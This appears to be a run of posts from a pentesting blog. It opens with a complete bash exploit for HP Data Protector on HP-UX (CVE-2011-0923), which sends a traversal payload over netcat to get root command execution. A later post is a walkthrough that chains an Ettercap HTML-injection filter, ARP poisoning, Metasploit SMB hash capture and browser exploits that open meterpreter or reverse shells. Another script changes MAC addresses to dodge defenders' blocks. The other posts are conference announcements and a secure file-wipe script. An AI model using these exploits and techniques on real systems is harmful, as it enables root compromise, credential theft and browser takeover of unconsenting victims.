H4CKarandas » Hacking

HP Data Protector Remote Shell for HPUX

Ch0ks — Fri, 05 Aug 2011 04:13:31 +0000

In many pentest that I have done, HPUX is one of the more commons UNIX OS that I found. It is a strong operating system running in a robust hardware, and when I got to know more about the Lights Out functionality I just fall in love. Al thought many companies uses it for running their main part of their business I have found the they don’t pay much attention on it’s security so it’s common to find production servers without patches or even running applications on insecure protocols like Telnet, FTP or even rlogin.

Since HPUX has been around for a long time and HP was concerned about its security he created the project Bastile for HPUX. I had used it to secure servers and I can say that it’s great! You have to be really careful because it closes a lot of stuff and it may, no sorry, it will broke the connectivity with your oldest applications. ( by the way, it moves the users hashes to the /tcb/files/auth/ folder ). This doesn’t mean you just run tomorrow, apply the Bastille on your servers and forget about them… YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY-

So this week I was working in a Pentest and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed, it wasn’t looking so good. Looking around I found that Data Protect has this nasty vulnerability and that fdisk has created a PoC for this Zero Day but in Windows. So with a lot of help from c4an (he ported this tool to the Metasploit Project that you can see in his blog) the server was compromised with root…. w00t w00t!

So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don’t own. You can also download it from my Hacking Projects section

#!/bin/bash # Exploit Title: HP Data Protector Remote Shell for HPUX # Date: 2011-08-02 # Author: Adrian Puente Z. # Software Link:http://www8.hp.com/us/en/software/software- # product.html?compURI=tcm:245-936920&pageTitle=data-protector # Version: 0.9 # Tested on: HPUX # CVE: CVE-2011-0923 # Notes: ZDI-11-055 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/ # Document.jsp?objectID=c02781143 # # Powered by Hackarandas www.hackarandas.com # Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks # Lots of thanks to David Llorens (@c4an) for all the help. # Ported to HPUX from fdisk's (@fdiskyou) Windows version. # Windows version: http://www.exploit-db.com/exploits/17339/ # # Shouts to shellhellboy, r3x, r0d00m, etlow, # psymera, nitr0us and ppl in #mendozaaaa #


[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` 
 \n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)

" && exit 0

HOST=`echo ${@} | awk '{print $1}'` PORT=`echo ${@} | awk '{print $2}'` CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'` SC="" SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d" SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68" SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d" SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30" SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d" SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30" SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00" SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00" SHELLCODE=${SC} ( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

This script is in Bash and can run in any Linux like Backtrack or in Windows using Cygwin and this is how it works:

The shellcode is 168 bytes and is injected directly on the port. The first 8 bytes of the 104 bytes of this shellcode is part of the protocol where we use the flag “C 20″ to tell Data Protect (I found that if we manipulates this value other things can be accomplished even writing directly to / ) to perform the vulnerable function that allows remote connections and execute files within it’s local bin directory.

"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d" "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68" "\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d" "\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30" "\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d" "\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30" "\x74\x2d\x00\x20\x30\x00\x20\x30\x00"

but if we use the Directory Path Traversal technique we can execute any binary within the file system. The next part was tricky, I can execute any command but I am unable to pass arguments directly to it, so after some debug I found I can spawn a /usr/bin/sh closing it with some nullbytes to get the complete 168 bytes and if I concatenates the command to execute it will pass directly to the shell and execute it with the user’s environment variables, in this case root, and returns us the output.

"\x20\x2e\x2e\x2f\x2e\x2e\x2f" "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" "\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00"

So at the end I get this to work doing this:

( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

The Netcat helps me to transports the shellcode to the port and it returns the output. It simply works.

So special thanks to fdisk for the PoC and David Llorens for the useful brainstorming, he also ported this tool to the Metasploit Project that you can see in his blog.

Adrian Puente Z.

Reunión CUM 2010

Ch0ks — Tue, 23 Nov 2010 22:36:55 +0000

Hace poco el buen Nitrous me comentó que se iba a armar una reunión del CUM (Comunidad Underground Mexico, no piensen mal) y despues el buen HKM autor del sitio Hakim me comentó que podía difundirlo.

Bueno, les hago extensiva la invitación a la Reunión anual del CUM y espero verlos por ahi!

IMPORTANTE:

El cupo es limitado así que es necesario que se registren enviando un correo a hkm _AT_ hakim _DOT_ ws, por mensaje privado en el foro de www.underground.org.mx al usuario hkm o en el Twitter de @_hkm.

La invitación

Es un placer informarles que la Reunión “anual” de su Comunidad Underground de México se llevará a cabo el próximo Viernes 26 de Noviembre de 3pm a 8pm en las nuevas instalaciones del TelmexHUB ubicado en Isabel la Catolica #51.

PLÁTICAS CONFIRMADAS:

1) DotDotPwn (nitr0us) : Herramienta para encontrar vulnerabilidades de Directory Traversal, disponible en BackTrack 4 R2.

2) ROP (tr3w) : Programacion orientada al retorno. Método para evadir stack no ejecutable (DEP, NX).

3) Teensy (hkm) : Dispositivo electrónico para simular un teclado y ejecutar comandos al estilo autorun en cualquier sistema operativo.

4) Ganando concursos en línea (webrek) : Viajes, autos y celulares son algunos de los premios ofrecidos en concursos en internet en México. Pero son realmente seguros estos aplicativos?

5) Unpacker genérico (Psymera) : Como desempacar el RunPE y crear un unpacker genérico para la mayoria de crypters que usan los lammos.

¿Cuándo?

Viernes 26 de Noviembre · 3:00pm – 8:00pm

¿Dónde?

Biblioteca Digital Bicentenario Telmex Hub
Isabel la Catolica #51 Col Centro.
Ciudad de México, Mexico

Estacionamiento Público

Encontraran estacionamiento público en la calle Venustiano Carranza como en la calle República de Uruguay

El mapita obligado:

View Larger Map

Espero pueda descolgarme de la oficina pero de igual forma todas las pláticas prometen mucho y siempre es importante conocer a la gente del medio. Si todo sale como espero espero verlos por alla!

Fuente del Post: Foro Underground

Adrián Puente Z.

Conferencia HUM – BugCon2010

Ch0ks — Thu, 28 Oct 2010 05:06:31 +0000

Quiero invitarlos a mi conferencia de HUM – Homemade Undetectable Malware que voy a dar en la BugCon2010 este viernes 29 de octubre del 2010. Es parte de lo que dí en la conferencia del ITESM pero voy a agregarle mas contenido y espero ahora si me salgan los demos. Jojojo.

No dejen de ir, hoy inició el congreso pero promete mucho y siempre es padre conocer gente del underground y profesionales de la seguridad informática. Un agradecimiento a Vendetta por facilitar el día de la conferencia y allá nos vemos.

Cómo llegar:

Centro Formación e Innovación Educativa (CFIE): Av. Wilfrido Massieu sin número esquina con Luis Enrique Erro Unidad Profesional “Adolfo López Mateos”, Zacatenco.

La forma más fácil de llegar desde el sur es tomar todo Insurgentes hacia el norte y salir en Av. Montevideo, en Montevideo llegar hasta el cruce con Av. Instituto Politécnico Nacional, seguir por Av. Politécnico y a una calle empieza Wilfrido Massieu allí lo reconoceran por que empiezan las rejas guindas del IPN. Seguir por Wilfrideo Massieu, lo más característico es el planetario que se distingue por ser esférico del techo, el edificio al lado es el CFIE, lo reconoceran por una pirámide de cristal que tiene en el techo en el frente hay una mantonta azul con la catarina.

Si es en transporte público lo más fácil es llegar a Metro Lindavista o Metro Politécnico, de Metro Lindavista pueden tomar un taxi deben ser como $10, de Metro Politécnico tendrían que caminar como 10 min por que la avenida es en sentido contrario.

El mapísima obligatorio.

View BugCon2010 in a larger map

Adrián Puente Z.

Technorati Tags: BugCon2010 hackarandas Adrian Puente Z. HUM Homemade Undetectable Malware conferencia

Conferencia: HUM – Homemade Undetectable Malware

Ch0ks — Fri, 27 Aug 2010 05:10:53 +0000

Tengo el gusto de anunciarles que el Profesor Arturo García conocido en el Twitter cómo @ElProfeSeguro, me ha invitado a dar una conferencia sobre HUM o Homemade Undetectable Malware en el ITESM CCM.

No quiero adelantar mucho de la conferencia pero platicaré de mi experiencia creando malware indetectable cómo estos se propagan y describiré las herramientas que utlilizo cómo el Metasploit y el Social Engineer Toolkit en las pruebas de penetración que realizo y cómo las combino con el Malware para mayor efectividad.

Fecha: Martes 31 de agosto de 2010

Hora: 19:00 hrs

Duración: 90 minutos

Lugar: ITESM CCM, Aula Magna 1. Primer piso. Aulas II.

Entrada libre y gratuita.

Cómo llegar:

Espero verlos por ahi y un agradecimiento a Arturo García y al ITESM CCM por la invitación y las facilidades para dar la conferencia.

ACTUALIZACION

Disfruté mucho dar la conferencia y un grupo muy participativo, realmente la pasé bien y tuve el gusto de conocer a @Paco_ dueño del interesante blog Hacking MX. Gracias a todos los que fueron y a quieren me invitaron y la presentación se las dejo en la sección de artículosdentro de mi blog o lo pueden descargar de la siguiente liga:

HUM: Homemade Undetectable Malware

Adrián Puente Z.

Technorati Tags: Adrian Puente Z., itesm ccm, hackarandas, malware, SET, metasploit, antivirus, undetectable, arturo garcia, elprofeseguro

Uncomplicated File Wipe for *NIX

Ch0ks — Wed, 18 Aug 2010 01:59:02 +0000

We needed to guarantee to one of our customers that a file will be securely deleted. Since the server was a HPUX Unix and we can’t compile nor install new applications, I managed to write this script to wipe the file.

The file is overwritten 7 times as the US Department of Defense clearing standard DoD 5220.22-M specifies and renamed another 7 times before being deleted. It is written for the KSH shell as many UNIX has it by default. It doesn’t run in bash but you can edit it to fit your needs.

Here is the code:

#!/usr/bin/ksh
# Script by Adrian Puente Z..
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

# US Department of Defense clearing standard DOD 5220.22-M (ECE)
PASES=7
# Device to overwrite the file.
# Can be:
# /dev/random
# /dev/urandom
# /dev/zero (less secure, overwritten with zeros)
RANDEV=/dev/urandom
NAME=$$
COUNT=0
FILE=$1

if [[ $# -eq 0 ]];then
print "Syntax: $0 "
exit 1
fi

if [[ ! -f $FILE ]]
then
print "File $FILE doesn’t exists"
exit 1
fi

if [[ ! -w $FILE ]]
then
print "Can’t write on file $FILE"
exit 1
fi

SIZE=$(ls -l $FILE | cut -d‘ ‘ -f5)

print -n "About to wipe file: $FILE are you sure? \"N/y\": "
read answer
print ""

if [[ ! ( $answer = ‘y’ || $answer = ‘Y’ ) ]]
then
print "Command canceled."
exit 0
fi

while [[ $COUNT -lt $PASES ]];do
(( COUNT += 1 ))
print "Pass number: $COUNT"
dd if=$RANDEV of=$FILE bs=$SIZE count=1
done

COUNT=0
echo "Renaming…"

while [[ $COUNT -lt $PASES ]];do
(( COUNT += 1 ))
(( NAME += "$NAME$COUNT" ))
mv -v $FILE $NAME
FILE=$NAME
done

rm -v $FILE
FILE=$1
echo File: $FILE deleted.
exit 0

The syntax is simple:

–.^ (ch0ks@xipe)*(20:38:05)*(~) ^.–
-=:)> uncomplicatedwipe.ksh
Syntax: uncomplicatedwipe.ksh

You can follow this commands to test the script:

hexdump /dev/urandom > foo.txt
#after some seconds press CTRL+C

Now we wipe the file

–.^ (ch0ks@xipe)*(20:36:00)*(tmp) ^.–
-=:)> uncomplicatedwipe.sh foo.txt
About to wipe file: foo.txt are you sure? "N/y": y

Pass number: 1
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 4.01637 s, 3.9 MB/s
Pass number: 2
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.87637 s, 4.0 MB/s
Pass number: 3
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 5.451 s, 2.8 MB/s
Pass number: 4
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 4.48904 s, 3.4 MB/s
Pass number: 5
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.88731 s, 4.0 MB/s
Pass number: 6
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.98379 s, 3.9 MB/s
Pass number: 7
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.2128 s, 4.8 MB/s
Renaming…
`foo.txt‘ -> `69257′
`69257‘ -> `761829′
`761829‘ -> `8380122′
`8380122‘ -> `92181346′
`92181346‘ -> `1013994811′
`1013994811‘ -> `11153942927′
`11153942927‘ -> `122693372204′
removed `122693372204‘
File: foo.txt deleted.

In the next release I will make a recursive version for directories and you can visit my other projects here.

Troubleshoot: Some Unix systems doesn’t have /dev/urandom device so you can play with the RANDEV variable to use the one you have.

Update: Some versions of HPUX doesn’t have /dev/[u]random so you can use as a desperate alternative the /dev/zero device. I found in a forum that some versions of HPUX doesn’t have the /dev/zero device so you can create it with this command:

#!/bin/sh

# major/minor for HPUX 11.X
mknod /dev/zero c 3 4
chown bin:bin /dev/zero
chmod 666 /dev/zero

Adrián Puente Z.

hackarandas, wipe, Adrian Puente Z., security, Secure Delete, unix, security, seguridad, ksh code

Infographic: A Short Story on Hacking

Ch0ks — Fri, 25 Jun 2010 17:03:11 +0000

I found this great infographic about hacking and I thought in sharing it. I hope you found it as interesting as I did.

Via: Online MBA

Technorati Tags:hackarandas, adrian puente z., infographic, online mba, hackers
Generated By Technorati Tag Generator

Adrián Puente Z.

SSH Hacking and Good Practices

Ch0ks — Fri, 11 Jun 2010 15:00:20 +0000

I got to confess that I am a big podcast fan and one I am fond of is PaulDotCom – Security Weekly (I also hear it while I am jogging) So when I read in the blog the Mark Baggett’s post: Capturing SSH V1 & V2 Credentials with a MitM ssh honeypot I just feel like “I have to try it”. So I did and wrote this presentation for Sm4rt Security Services’ Tech Day, but I wanted to go further so I wrote it in a way that can be useful for the Pentesters and the Information Security Officers in the company.

In the first part I talk about some basic concepts about SSH then I got for the hacking part so I give a demonstration based on the Mark Baggett’s post and I finish giving come SSH security tips based on my experience and some articles I found on Internet. I hope you found it interesting.

You can download it from here:

SSH Hacking and Good.Practices by Adrian Puente Z. (PDF Presentation)

Please visit my other Hacking Projects o Security Articles.

If you have something valuable to add to this presentation, please leave your comment.

References:

Adrián Puente Z.

Technorati Tags:
Adrian Puente Z. hackarandas SSH hacking Man in the Middle Best Practices Security

BugCON Security Conference 2010

Ch0ks — Thu, 22 Apr 2010 06:12:49 +0000

Translate to English

BugCON Security Conference es un evento de seguridad meramente técnico en donde los mas importantes investigadores del área muestran sus últimos descubrimientos.

En la edición 2008 BugCON fue catalogado como el evento de cómputo con nivel mas alto en todo México, por encima de congresos y eventos similares. En 2009 se llego a mas de 2800 asistentes, 30 conferencias, 11 talleres y 2 competencias.

Este año BugCON celebra su tercer edición del 26 al 28 de Octubre en instalaciones del Instituto Politécnico Nacional en México D.F.

El Call For Papers cierra en Agosto, al igual que el deadline para patrocinadores. Si requieres más información puedes escribir a cualquiera de los organizadores o visitar el sitio web www.bugcon.org

No te lo puedes perder

—
Armin García López
Presidencia
darknight _AT_ bugcon _DOT_ org

Carlos A. Lozano Vargas
Fundador
vendetta _AT_ bugcon _DOT_ org

Alejandro Hernández Flores
Organizador Técnico
alt3kx _AT_ bugcon _DOT_ org

Añadelo a tus eventos en Facebook!

http://www.facebook.com/event.php?eid=119998731350362

Adrián Puente Z.

Fast MAC Address Changer in Linux

Ch0ks — Fri, 02 Apr 2010 20:01:49 +0000

When you are making a pentest sometimes you need to be sneaky and have some tricks in your arsenal to cloak yourself in the network. But some sysadmins are skillfull in their incident response and, sometimes (not many in my experience) they found you and try to block your access creating some ACLs for the IP you are using, maybe for your MAC Address.

This script runs on linux and helps you changing your MAC Address in a blink of an eye, this is how it works: you invoke the command and automatically see if you are root, if not it sudo itself to get the needed priviledges, generates a new random mac and installs it in the interface.

-=:)> changemacrandom.sh

For example:

-=:)> changemacrandom.sh eth0
Only root can do that! sudoing…
eth0 Link encap:Ethernet HWaddr 00:15:c5:3d:e9:82
Interface eth0 has new mac:
eth0 Link encap:Ethernet HWaddr 70:e7:84:ca:b2:c5
Restart dhcp client to get a new IP.

The code is really simple:

#!/bin/bash
# Script by Adrian Puente Z. apuente _AT_ hackarandas _dot_ com
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

[ $# -eq 0 ] && echo "Sintax: `basename $0` " && exit 0

[ `id -u` -ne 0 ] && echo "Only root can do that! sudoing…"
if [ "$EUID" != 0 ]; then sudo `which $0` $1; exit; fi

INT=$1

function gennewmac
{
hexdump /dev/urandom | head -3 |\
cut -d‘ ‘ -f2 | while read -n 2 i
do echo -n $i:
done | sed ‘s/::/:/g;s/:$//g’
}

if ifconfig ${INT} 2> /dev/null 2>&1 | head -1
then
NEWMAC=`gennewmac`
sleep 3
if ifconfig ${INT} down hw ether ${NEWMAC} 2>/dev/null
then
echo Interface ${INT} has new mac:
ifconfig ${INT} 2> /dev/null 2>&1 | head -1
ifconfig ${INT} up
echo Restart dhcp client to get a new IP.
else
echo "Error changing MAC to ${NEWMAC}!"
echo "Try again with the same command."
exit 1
fi
else
echo "Interface ${INT} doesn’t exists!"
exit 1
fi
exit 0

You can download the script or check other projects i’ve made.

So that’s it. Leave your comments please and happy hacking!

Adrián Puente Z.

hackarandas, hacker, mac changer, Adrian Puente Z., Linux, backtrack, pentest

Ettercap + Metasploit – Helping the Aurora Attack

Ch0ks — Thu, 28 Jan 2010 06:48:17 +0000

I found a nice trick from Fulfor based in another trick from Iron Geek that I applied in a Pentest using the magical HD Moore’s Metasploit and his browser_autopwn module and now I am adding the Aurora IE new Metasploit module.

This trick has 3 parts:

The Ettercap Filter

Based on the Irongeek’s Fun with Ettercap Filters and Bob’s Fulfor article I am creating the next ettercap filter:

# Just copy and paste in you terminal.
cat > ch0ks.browser_autopwn.attack.filter << __END
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-gnidocnE");
# note: replacement string is same length as original string
msg("Encoding Taken Care Of…\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("head>", "head> \"http://192.168.123.3:80/\"> \"\\\\192.168.123.3\\share\\pixel.gif\">");
replace("body>", "body> \"http://192.168.123.3:80/\"> \"\\\\192.168.123.3\\share\\pixel.gif\">");
msg("Replacement Filter Ran.\n");
}

__END

The IP string 192.168.123.3:80 is the IP with the port where I have the browser_autopwn module wating for the connection and I am using the head and body tag because I want my attack to be the first thing they load. Now we compile the code:

etterfilter -o ch0ks.browser_autopwn.attack.ef ch0ks.browser_autopwn.attack.filter

12 protocol tables loaded:
DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

11 constants loaded:
VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

Parsing source file ‘ch0ks.browser_autopwn.attack.filter’ done.

Unfolding the meta-tree done.

Converting labels to real offsets done.

Writing output to ‘ch0ks.browser_autopwn.attack.ef’ done.

-> Script encoded into 16 instructions.

Now we start the ettercap making the ARP Poisoning attack and injecting the HTML code:

ettercap -P smb_down -i eth0 -l logfile-`date +%F-%s` -m msgfile-`date +%F-%s` -T -M arp:remote -F ch0ks.browser_autopwn.attack.ef /192.168.123.39,42,33,106,154/ /192.168.123.1/

The commands is running ettercap with the smb_down plugin that forces the connection to be a LM authentication, so it searches for the \\192.168.5.45\share\pixel.gif file that will be waiting the metasploit auxiliary/server/capture/smb module and will be logging the hashes. Also the Ettercap will be logging everything in the logfile and msgfile and making an ARP Poisoning between the first IPs in // and the second, I really recommend to use a little number of IPs and the Gateway to avoid making a DoS on the network. The -F is the parameter will load our brand new filter that will inject on the fly HTML code in the traffic between the victims, that’s why is important to use the gateway.

No we have to start our Metasploit attack. This is not new, I took the idea from Bob’s Fulfor article. I just gonna update it to work with the Metasploit Framework 3 and add it the browser_autopwn or the aurora attack.

In the moment I am writting this article I am using the metasploit v3.3.4-dev [core:3.3 api:1.0].

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #

=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ — –=[ 324 exploits – 105 auxiliary
+ — –=[ 217 payloads – 20 encoders – 6 nops
=[ svn r8286 updated today (2010.01.28)

msf >

For the next modules you need to work with the root account because you need to open priviledges ports like 80, 135 and 445 for the attack to work. I am using Ubuntu Linux Karmic Koala, but you can use the Backtrack Project for this attack.

NTLM or LM Interception.

We start the attack.

sudo msfconsole
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set LOGFILE Metasploit139.log
LOGFILE => Metasploit139.log
msf auxiliary(smb) > set PWFILE Metasploit139.pwd
PWFILE => Metasploit139.pwd
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.

msf auxiliary(smb) > set LOGFILE Metasploit445.log
LOGFILE => Metasploit445.log
msf auxiliary(smb) > set PWFILE Metasploit445.pwd
PWFILE => Metasploit445.pwd
msf auxiliary(smb) > set SRVPORT 445
SRVPORT => 445
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) >

I am running the service on both 139 and 445 because in my experience it improves the chances to catch an authentication hash. Now we have to wait and with some luck you sould see something like:

[*] Received 192.168.0.103:2281 MYDOMAIN\LAMEUSER LMHASH:7c83b9be93e202a4be355b75e982144b59bb9f836ec26200 NTHASH:9fc0fba25cb2817441a0ca8c003a4b68da83ef9e72514b2e OS:Windows 2002 2600 Service Pack 1 LM:Windows 2002 5.1

This is good but you can’t just use that hash to authenticate so you have to crack it using the idea from carnal0wnage’s blog article: Using the Metasploit SMB Sniffer Module NOTE: The tool halflm_second.rb is in the tools directory inside the Metsploit directory.

Attacking the Browser directly

Now we have to start the browser_autopwn

msf auxiliary(smb) > use windows/browser/ie_aurora
msf exploit(ie_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/bind_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST no The target address

Exploit target:

Id Name
– —-
0 Automatic

msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started bind handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.123.3:80/
[*] Server started.

That’s it now you have to wait so a browser bite the bait and get a meterpreter console. This was about the Aurora new Metasploit’s module because is the new trend of the night but let’s face it, it is just part of the big world of the browser attacks. So if you are just lazy you can use the browser_autopwn module:

msf auxiliary(browser_autopwn) > db_driver sqlite3
[*] Using database driver sqlite3
msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > set LHOST 192.168.123.3
LHOST => 192.168.123.3
msf auxiliary(browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(browser_autopwn) > set URIPATH /
URIPATH => /
msf auxiliary(browser_autopwn) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.123.3 yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Starting exploit modules on host 192.168.123.3…
[*] —

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/IC0F7kIlYh
[*] Local IP: http://192.168.123.3:80/IC0F7kIlYh
[*] Server started.
…
[*] Starting the payload handler…
[*] Started reverse handler on port 6666
[*] Starting the payload handler…

[*] — Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.123.3:80/
[*] Server started.

That’s it now you have to wait so a browser bite the bait and get a shell inside the computer with the user priviledges that is running the browser.

Happy Pentesting

Adrián Puente Z.

Technorati Tags:
hackarandas; Adrian Puente Z.; Metasploit; Hacker; Aurora IE ; Ettercap; arp poisoning; security; pentest; pentesting; hacking; hacker; smb; hashes; Tag generator